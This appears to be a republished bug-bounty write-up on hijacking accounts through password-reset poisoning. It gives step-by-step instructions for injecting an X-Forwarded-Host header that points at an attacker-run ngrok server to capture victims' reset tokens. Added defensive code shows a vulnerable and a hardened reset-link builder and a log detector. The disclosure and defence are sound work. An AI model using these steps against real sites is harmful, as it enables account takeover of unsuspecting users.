How to add X-Forwarded-Host to password reset request package to achieve complete hijacking of victim account

2025-01-22 Update From: SLTechnology News&Howtos (Network Security)

Shulou (Shulou.com) 05/31 Report

Today I will walk you through how adding an X-Forwarded-Host header to a password reset request can lead to complete hijacking of the victim's account. Many people may not be familiar with this issue, so to make it easier to understand the editor has summarized the following. I hope you get something out of this article.

By using the "forgot password" function of the target website and adding an X-Forwarded-Host header to the password reset request, the target website can be tricked into pointing the password reset link at a server controlled by the tester, which allows complete hijacking of the victim's account.

Here, for confidentiality reasons, assume the target test site is redacted.com. During testing I focused on its "forgot password" function. After six hours of effort, I found a very interesting vulnerability that could be used to hijack the target victim's account completely.

Discovery process

Required tools: BurpSuite, Ngrok server. The Ngrok service maps a local PC to a public server in the cloud, so that the local PC becomes a terminal reachable from the external network; in effect the cloud server acts as a relay between the public network and the private PC.

1. Visit the forgot password function of the target website and enter the user name to request a password reset link: https://redacted.com/users/forgot_password. Note: the target website will then send a password reset link to the registered mailbox.

2. While doing the above, capture the web request with BurpSuite. The request packet is as follows:

Let's add X-Forwarded-Host: bing.com to the request and see whether the target site will generate the password reset link with bing.com as its host.

X-Forwarded-For (XFF) is an HTTP request header field used to identify the original IP address of a client connecting to a web server through an HTTP proxy or load balancer. The developers of the Squid caching proxy server first introduced this header field, and it was later formally proposed by the IETF in a standardization draft for HTTP header fields [1]. X-Forwarded-Host is the related header that carries the Host originally requested by the client, and it is this header that the application here trusts when building the reset link.

3. Now open the mailbox and see what the password reset link sent by the target website looks like. From the email we received, we can see that it contains the password reset link with the user's Token, which looks like this:

https://bing.com/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES

This shows that my password reset Token has been forwarded to bing.com. To verify that this Token is really valid, replace the https://bing.com in the password reset link with the target website's https://redacted.com.

4. Sure enough, this opens a page on which the password can really be reset!
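To make the root cause concrete, here is an added example (not code from the original article or from the tested site) of a minimal reset-link builder in the shape the write-up describes: the vulnerable form takes the link host from X-Forwarded-Host, the hardened form uses a configured canonical origin and ignores forwarding headers. The origin, path and hosts are constructed for the example.

```python
# Added example: vulnerable vs hardened password-reset link construction.
# CANONICAL_ORIGIN and RESET_PATH are constructed values for this example.
from urllib.parse import urlparse

CANONICAL_ORIGIN = "https://redacted.com"  # configured, never taken from the request
RESET_PATH = "/users/reset_password/"


def build_reset_link_vulnerable(headers: dict, token: str) -> str:
    """Reproduces the bug: the link host is taken from X-Forwarded-Host (or
    Host), so a client-supplied header decides where the token is sent."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    scheme = headers.get("X-Forwarded-Proto", "https")
    return f"{scheme}://{host}{RESET_PATH}{token}"


def build_reset_link_hardened(headers: dict, token: str) -> str:
    """Fix: build the link from a server-side configured origin only.
    Request headers are not consulted for link construction at all."""
    return f"{CANONICAL_ORIGIN}{RESET_PATH}{token}"


def link_host_is_trusted(link: str, allowed_hosts=("redacted.com",)) -> bool:
    """Defensive check before sending mail: exact hostname allowlist, so
    look-alikes such as 'redacted.com.evil.example' are rejected."""
    parsed = urlparse(link)
    return parsed.scheme == "https" and parsed.hostname in allowed_hosts


if __name__ == "__main__":
    # Constructed headers mirroring step 2 of the write-up.
    req = {"Host": "redacted.com", "X-Forwarded-Host": "bing.com"}
    token = "EXAMPLE_TOKEN"
    bad = build_reset_link_vulnerable(req, token)
    good = build_reset_link_hardened(req, token)
    print("vulnerable:", bad, "trusted:", link_host_is_trusted(bad))
    print("hardened:  ", good, "trusted:", link_host_is_trusted(good))
```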

Vulnerability exploitation

Based on the above operations and the problem they reveal, I can build a setup to hijack a user's account. The steps are as follows:

1. Set up the Attacker server through the ngrok service.

2. Start capturing with BurpSuite, enter the victim's user name in the target website's "forgot password" form, and submit the password reset request.

3. In the password reset request captured by BurpSuite, add the Attacker server as an X-Forwarded-Host header, for example:

X-Forwarded-Host: ngrok.io

Here ngrok.io stands for the domain name of the Attacker server.

4. As a result, the password reset link that the target website sends to the victim's mailbox contains the domain name of the Attacker server, for example:

http://ngrok.io/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES

When the victim clicks this link, the browser sends the request, including the victim's password reset Token, to the Attacker server ngrok.io (so this step requires user interaction).

5. When the victim clicks the link, the attacker sees on the Attacker server ngrok.io a request containing the victim's password reset Token, as follows:

6. After obtaining the victim's password reset Token, the attacker replaces the Attacker server ngrok.io with the target website https://redacted.com, appends the victim's password reset Token, and can then reset the password of the victim's account and hijack it completely.
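From the defender's side, the injected header in step 3 is visible at the edge long before any mail goes out. The following is an added example (not from the original article) of detection logic run over constructed access-log lines; it assumes the edge proxy logs the X-Forwarded-Host header (for nginx, the $http_x_forwarded_host variable in a custom log_format) and the field layout below is constructed for this example.

```python
# Added example: flag password-reset requests carrying a foreign X-Forwarded-Host.
# Log format, hosts and paths are constructed for this example.
import re
from dataclasses import dataclass

ALLOWED_HOSTS = {"redacted.com", "www.redacted.com"}   # our own hostnames only
RESET_PATHS = ("/users/forgot_password", "/users/reset_password")

# Constructed format: client_ip "METHOD path" status "host" "x_forwarded_host"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) '
    r'"(?P<host>[^"]*)" "(?P<xfh>[^"]*)"$'
)

SAMPLE_LOG = """\
203.0.113.7 "POST /users/forgot_password" 200 "redacted.com" "-"
203.0.113.9 "POST /users/forgot_password" 200 "redacted.com" "bing.com"
203.0.113.9 "POST /users/forgot_password" 200 "redacted.com" "redacted.com"
198.51.100.4 "GET /users/reset_password/TOKEN" 200 "redacted.com" "-"
198.51.100.4 "GET /images/logo.png" 200 "redacted.com" "bing.com"
203.0.113.9 "POST /users/forgot_password" 200 "redacted.com" "redacted.com.evil.example"
"""


@dataclass
class Finding:
    ip: str
    path: str
    forwarded_host: str


def find_reset_poisoning_attempts(log_text: str) -> list:
    """Return one Finding per reset-flow request whose X-Forwarded-Host is
    present and not an exact match for one of our own hosts. Other paths are
    ignored to keep noise down; exact matching defeats look-alike suffixes."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith(RESET_PATHS):
            continue
        xfh = m["xfh"].strip().lower()
        if xfh in ("", "-"):          # header absent ("-" is nginx's empty marker)
            continue
        if xfh.split(":")[0] not in ALLOWED_HOSTS:   # strip any :port before matching
            findings.append(Finding(m["ip"], m["path"], xfh))
    return findings


if __name__ == "__main__":
    for f in find_reset_poisoning_attempts(SAMPLE_LOG):
        print(f"ALERT reset-link poisoning attempt from {f.ip}: {f.path} X-Forwarded-Host={f.forwarded_host}")
```

The same rule can be expressed in a SIEM query; the point is to alert on the forgot-password endpoint specifically, since X-Forwarded-Host on ordinary page requests is often benign proxy behaviour.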

After reading the above, do you have a better understanding of how adding X-Forwarded-Host to a password reset request can lead to complete hijacking of the victim's account? If you want to learn more, please follow the industry information channel. Thank you for your support.
